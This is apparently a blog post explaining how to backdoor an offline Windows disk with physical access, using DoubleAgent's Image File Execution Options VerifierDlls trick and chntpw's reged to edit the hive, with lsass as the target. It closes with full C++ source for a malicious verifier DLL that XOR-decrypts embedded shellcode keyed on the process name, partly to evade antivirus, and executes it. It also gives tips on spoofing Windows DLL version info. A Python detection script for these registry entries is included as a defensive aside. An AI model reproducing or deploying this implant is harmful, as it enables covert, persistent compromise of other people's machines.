Infecting the Windows system on a disk with DoubleAgent and chntpw
2023-07-17 12:03:06

Close-access backdoor implants mostly rely on BadUSB and similar tricks to plant the backdoor after logging into the system (or forcing a login); this leaves many traces and the target is fairly obvious.

This article describes a way to implant a backdoor into the system on a disk given physical access (booting a PE system, removing the hard disk, etc.), assuming no full-disk encryption.

DoubleAgent

Introduction

https://github.com/Cybellum/DoubleAgent

DoubleAgent is a new Zero-Day technique for injecting code and maintaining persistence on a machine (i.e. auto-run).

DoubleAgent can exploit:

  • Every Windows version (Windows XP to Windows 10)
  • Every Windows architecture (x86 and x64)
  • Every Windows user (SYSTEM/Admin/etc.)
  • Every target process, including privileged processes (OS/Antivirus/etc.)

DoubleAgent exploits a 15-year-old legitimate feature of Windows and therefore cannot be patched.

How it works

DoubleAgent abuses the verifier-provider (VerifierDll) feature that Windows offers: by editing a registry key, a DLL that follows the verifier-provider structure is loaded into an arbitrary process. After the following values are set under

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xxx.exe

the following values are configured:

"GlobalFlag"="0x100"
"VerifierDlls"="DoubleAgentDll.dll"

the system loads the DLL with the configured name from system32 whenever it starts xxx.exe.
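Detecting this footprint, as an added example that is not part of the original post: the script below parses a .reg export (what reged -x produces from the offline SOFTWARE hive, or reg export on a live system) and flags Image File Execution Options entries that enable Application Verifier or name provider DLLs. The sample .reg text is constructed, and the stock-provider allow-list is an assumption to extend for your own baseline.

```python
# Added audit example (not from the original post): scan a .reg export for Image File Execution
# Options entries that set GlobalFlag bit 0x100 and name VerifierDlls, the footprint described
# above. Offline, export the SOFTWARE hive with reged -x; the .reg text below is constructed.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe]
"GlobalFlag"="0x100"
"VerifierDlls"="DoubleAgentDll.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="C:\\tools\\debug.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe]
"GlobalFlag"=dword:00000100
"VerifierDlls"="vrfcore.dll vfbasics.dll"
"""
IFEO = "\\image file execution options\\"   # also matches the Wow6432Node copy
FLG_APPLICATION_VERIFIER = 0x100
# Stock Application Verifier providers (assumed allow-list; extend for your baseline).
STOCK_PROVIDERS = {"verifier.dll", "vrfcore.dll", "vfbasics.dll"}

def parse_reg(text):
    """Parse .reg text into {key path: {value name: raw data}}; default (@) values are ignored."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and line.startswith('"'):
            name, _, data = line[1:].partition('"=')
            keys[current][name] = data
    return keys

def parse_flag(data):
    """GlobalFlag as gflags writes it (dword:00000100) or as the post shows it ("0x100")."""
    if data.lower().startswith("dword:"):
        return int(data[6:], 16)
    return int(data.strip('"'), 0)

def find_verifier_providers(reg_text):
    """One finding per IFEO entry that enables Application Verifier or names a provider DLL."""
    findings = []
    for key, values in parse_reg(reg_text).items():
        if IFEO not in key.lower():
            continue
        flag = parse_flag(values["GlobalFlag"]) if "GlobalFlag" in values else 0
        dlls = values.get("VerifierDlls", "").strip('"').split()
        if flag & FLG_APPLICATION_VERIFIER or dlls:
            findings.append({"exe": key.rsplit("\\", 1)[1], "dlls": dlls,
                             "verifier_enabled": bool(flag & FLG_APPLICATION_VERIFIER),
                             "suspicious": any(d.lower() not in STOCK_PROVIDERS for d in dlls)})
    return findings
```

Any hit whose DLL is not a known provider, or whose named DLL does not exist in System32 with a valid Microsoft signature, deserves a look; entries with only a Debugger value are a different persistence mechanism and are not reported here.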

Anti-virus defenses

In testing, anti-virus software blocks writes to this key, so the technique runs into trouble while AV is active. In a close-access scenario the write can simply be made while AV is not running.

chntpw

chntpw is an old toolkit that provides Windows registry editing (tested and found quite usable; it can import registry files directly).

It ships the reged program:

root@kali:~# reged -h
reged version 0.1 140201, (c) Petter N Hagen

Modes:
-x <registryhivefile> <prefixstring> <key> <output.reg>
Xport. Where <prefixstring> for example is HKEY_LOCAL_MACHINE\SOFTWARE
<key> is key to dump (recursively), \ or \\ means all keys in hive
Only one .reg and one hive file supported at the same time
-I <registryhivefile> <prefixstring> <input.reg>
Import from .reg file. Where <prefixstring> for example is HKEY_LOCAL_MACHINE\SOFTWARE
Only one .reg and one hive file supported at the same time
-e <registryhive> ...
Interactive edit one or more of registry files

Options:
-L : Log changed filenames to /tmp/changed, also auto-saves
-C : Auto-save (commit) changed hives without asking
-N : No allocate mode, only allow edit of existing values with same size
-E : No expand mode, do not expand hive file (safe mode)
-t : Debug trace of allocated blocks
-v : Some more verbose messages

(Tested: a Windows build can be compiled and works normally.)

Putting it together

With the two techniques above introduced, it is easy to guess how the backdoor gets into the system on the disk.

Implant it from a PE system booted on the target machine, or remove the hard disk and implant it from your own device:

  • Build a backdoor in the VerifierDll format (written here by following some open-source code; the code is at the end)
  • Use reged to edit the registry hive of the on-disk system and add VerifierDlls
  • Copy the backdoor DLL over

This implants the backdoor without ever booting the target system, but note that monitoring of sensitive directories may catch the copied DLL file.

Injection tool

Only manual installation has been verified; there is no tool yet.

A tool would only need to automate:

1. Find the disk that contains Windows

2. Call reged -I <registryhivefile> <prefixstring> <input.reg>

where the registry hive path (XP and later) is

Windows\system32\config\System

3. Copy the DLL file

Registry

You can use the DoubleAgent tool to inject and then export the registry, or add the values manually (lsass is chosen here: high privilege, starts early, widely applicable).

VerifierDll

Since the name of the process that will be injected is known in advance, the shellcode is decrypted with the process name so that static analysis by AV cannot recover it.

After the DLL is compiled, the version information of a Windows DLL can also be cloned to make it look genuine. Digital signatures are left to each person's ingenuity: once it is noticed that the signature is not Microsoft's the game is basically over, and one could also try installing a root certificate to spoof it, but that is another topic.

// dllmain.cpp : Defines the entry point for the DLL application.

#include "pch.h"
#include <windows.h>
#include <winternl.h>
#include "shellcode.h"
#define _NO_CRT_STDIO_INLINE 1
#define NOMINMAX
#define _CRT_SECURE_NO_WARNINGS
#define WIN32_NO_STATUS
#define WIN32_LEAN_AND_MEAN
// See AVRF.md to get how this thing works

// Semi-private ntapi stuff

EXTERN_C_START
# define DebugPrint(str, ...) DbgPrintEx( 103u, 3u, "[RAT] " __FUNCTION__ ": " str, ## __VA_ARGS__)
using RTL_VERIFIER_DLL_LOAD_CALLBACK = VOID(NTAPI*) (PWSTR DllName, PVOID DllBase, SIZE_T DllSize, PVOID Reserved);
using RTL_VERIFIER_DLL_UNLOAD_CALLBACK = VOID(NTAPI*) (PWSTR DllName, PVOID DllBase, SIZE_T DllSize, PVOID Reserved);
using RTL_VERIFIER_NTDLLHEAPFREE_CALLBACK = VOID(NTAPI*) (PVOID AllocationBase, SIZE_T AllocationSize);
typedef struct _RTL_VERIFIER_THUNK_DESCRIPTOR {
PCSTR ThunkName;
PVOID ThunkOldAddress;
PVOID ThunkNewAddress;
} RTL_VERIFIER_THUNK_DESCRIPTOR, * PRTL_VERIFIER_THUNK_DESCRIPTOR;

typedef struct _RTL_VERIFIER_DLL_DESCRIPTOR {
PCWSTR DllName;
DWORD DllFlags;
PVOID DllAddress;
PRTL_VERIFIER_THUNK_DESCRIPTOR DllThunks;
} RTL_VERIFIER_DLL_DESCRIPTOR, * PRTL_VERIFIER_DLL_DESCRIPTOR;

typedef struct _RTL_VERIFIER_PROVIDER_DESCRIPTOR {
DWORD Length;
PRTL_VERIFIER_DLL_DESCRIPTOR ProviderDlls;
RTL_VERIFIER_DLL_LOAD_CALLBACK ProviderDllLoadCallback;
RTL_VERIFIER_DLL_UNLOAD_CALLBACK ProviderDllUnloadCallback;
PCWSTR VerifierImage;
DWORD VerifierFlags;
DWORD VerifierDebug;
PVOID RtlpGetStackTraceAddress;
PVOID RtlpDebugPageHeapCreate;
PVOID RtlpDebugPageHeapDestroy;
RTL_VERIFIER_NTDLLHEAPFREE_CALLBACK ProviderNtdllHeapFreeCallback;
} RTL_VERIFIER_PROVIDER_DESCRIPTOR, * PRTL_VERIFIER_PROVIDER_DESCRIPTOR;


static VOID NTAPI DllLoadCallback(PWSTR DllName, PVOID DllBase, SIZE_T DllSize, PVOID Reserved);

static RTL_VERIFIER_DLL_DESCRIPTOR s_dll_descriptors[] = { {} };

static RTL_VERIFIER_PROVIDER_DESCRIPTOR s_provider_descriptor =
{
sizeof(RTL_VERIFIER_PROVIDER_DESCRIPTOR),
s_dll_descriptors,
&DllLoadCallback
};
#pragma comment(lib, "ntdll.lib")
#define NtCurrentProcess() (HANDLE(LONG_PTR(-1)))
NTSYSAPI
NTSTATUS
NTAPI
LdrDisableThreadCalloutsForDll(
_In_ PVOID DllImageBase
);
NTSYSAPI
ULONG
DbgPrintEx(
ULONG ComponentId,
ULONG Level,
PCSTR Format,
...
);
EXTERN_C_END


void Xor(char* key, unsigned char* dst, int dstlen) {
size_t keylen = strlen(key);
for (int i = 0; i < dstlen; i++) {
*(dst + i) ^= key[i % keylen];
}
}



VOID CALLBACK MyWaitCallback(
PTP_CALLBACK_INSTANCE Instance,
PVOID Parameter,
PTP_WAIT Wait,
TP_WAIT_RESULT WaitResult
)
{
// Instance, Parameter, Wait, and WaitResult not used in this example.
UNREFERENCED_PARAMETER(Instance);
UNREFERENCED_PARAMETER(Parameter);
UNREFERENCED_PARAMETER(Wait);
UNREFERENCED_PARAMETER(WaitResult);
char exepath[128];
DWORD pathlen = 128;
QueryFullProcessImageNameA(GetCurrentProcess(), 0, exepath, &pathlen);
char text[9] = { 0x0a,0x54,0x36,0x32,0x0a,0x1a,0x01,0x0b,0x77 };
Xor(exepath, (unsigned char*)text, 9);
//MessageBoxA(0, text, "My DLL Injected!", 0);
Xor(exepath, shellcode, 236614);
LPVOID heapp = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
LPVOID ptr = HeapAlloc(heapp, 0, 409600);
RtlMoveMemory(ptr, shellcode, sizeof(shellcode));
HANDLE hEvent;
hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);
PTP_WAIT ptp_w = CreateThreadpoolWait((PTP_WAIT_CALLBACK)ptr, NULL, NULL);
SetThreadpoolWait(ptp_w, hEvent, 0);
SetEvent(hEvent);
WaitForThreadpoolWaitCallbacks(ptp_w, FALSE);
SetEvent(hEvent);
while (TRUE)
{
Sleep(10000);
}
}


VOID waitPool() {
char exepath[128];
DWORD pathlen = 128;
QueryFullProcessImageNameA(GetCurrentProcess(), 0, exepath, &pathlen);
char code[18] = { 0x16,0x54,0x2f,0x27,0x19,0x01,0x16,0x1b,0x57,0x25,0x39,0x21,0x0a,0x1a,0x1b,0x0b,0x4c,0x33 };
Xor(exepath, (unsigned char *)code, 18);
if (strcmp(code, "Unspport Version!")) return;
HANDLE hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);
PTP_WAIT ptp_w = CreateThreadpoolWait((PTP_WAIT_CALLBACK)MyWaitCallback, NULL, NULL);
SetThreadpoolWait(ptp_w, hEvent, 0);
SetEvent(hEvent);
WaitForThreadpoolWaitCallbacks(ptp_w, FALSE);
SetEvent(hEvent);
}
BOOL WINAPI DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
PRTL_VERIFIER_PROVIDER_DESCRIPTOR* provider
)
{

switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
LdrDisableThreadCalloutsForDll(hModule);
waitPool();
break;
case 4://DLL_PROCESS_VERIFIER
*provider = &s_provider_descriptor;
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}


static VOID NTAPI DllLoadCallback(PWSTR DllName, PVOID DllBase, SIZE_T DllSize, PVOID Reserved)
{
UNREFERENCED_PARAMETER(DllSize);
UNREFERENCED_PARAMETER(Reserved);
//dll_loaded(DllBase, DllName);
}